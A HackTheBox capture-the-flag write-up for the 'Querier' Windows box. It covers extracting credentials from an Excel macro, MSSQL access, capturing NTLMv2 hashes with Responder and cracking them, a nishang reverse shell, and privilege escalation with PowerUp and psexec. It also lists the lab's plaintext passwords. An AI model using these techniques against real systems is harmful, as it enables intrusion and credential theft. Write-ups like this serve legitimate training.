Querier — HackTheBox Writeup
Querier was an awesome box that had some pretty neat things which are good for Windows beginners. The box starts with smb enumeration that gives us credentials to login to database server. I’ll get the host to make an SMB connect back to me, where I can collect Net-NTLMv2 challenge response, and crack it to get a password. With that all being said,
Lets jump right in.
Enumeration and Recon
Nmap Scan
SMB — TCP 445
Reports looks interesting. Lets check what we’ve got there.
There’s a file with “xslm” extension. Running file command against it says that it’s a Microsoft Excel Document. I tried to open it via Google Sheets only to get trolled. Later I ran a binwalk to see what’s hidden in the file.
I used oletools to get the macros and found a potential username and password.
Username = reporting
Password = PcwTWTHRwryjc$c6
Database = volume
MSSQL — 1433
Now that we have the credentials, lets login to DB and check what we’ve got.I tried logging in with sqsh and dbeaver but they failed for some reason. Later I used this metasploit auxiliary module auxiliary/admin/mssql/mssql_sql to enumerate database.
There we go, we get the SQL Server version. Since enumerating with this module is quite slow, I switched to impacket — mssqlclient to continue enum.
Enabling xp_cmdshell failed, so we might have to escalate to a higher privilege user. Lets grab hashes using responder.
This is a good article for getting ntlm hashes from windows.
Run responder -I tun0 -v to start responder
Lets crack these hashes with john.
Username = mssql-svc
Password = corporate568
Time to login again to the database again. When I first did this, I logged into msrpc ( port 135 ) with the above credentials, but couldn’t go any further with it.
xp_cmdshell is enabled and we can ping ourselves. Awesome. Time to get a shell.
Shell as mssql-svc
I used nishang Invoke-PowerShellTcp.ps1
for reverse shell.
PrivEsc to system
I ran PowerUp.ps1 and right off the bat, I found Admin creds.
Username : Administrator
Password: MyUnclesAreMarioAndLuigi!!1!
Reading flags
net use
Just get’s access to the filesystem, but that’s all that is needed to get the flags:
Shell as nt-authority\system
Since we have admin creds we can just use impacket/psexec.py to login.
Make sure you download the latest psexec.py file as I had issues with the file which I got after cloning the repo. This shell is slow in nature, be patient.
powershell “run as”
Use the password to create a credential that can be passed to Invoke-Command
. In this case, adminShell.ps1
is another Invoke-PowerShellTcp.ps1
with the port changed to 9001:
I tried to use WinRM to get shell as admin but it gave me authorization error.
Well, that’s all from me this time. Hope you had a great time reading.
Thanks and Happy Hacking,
Preetham (@cyber01 )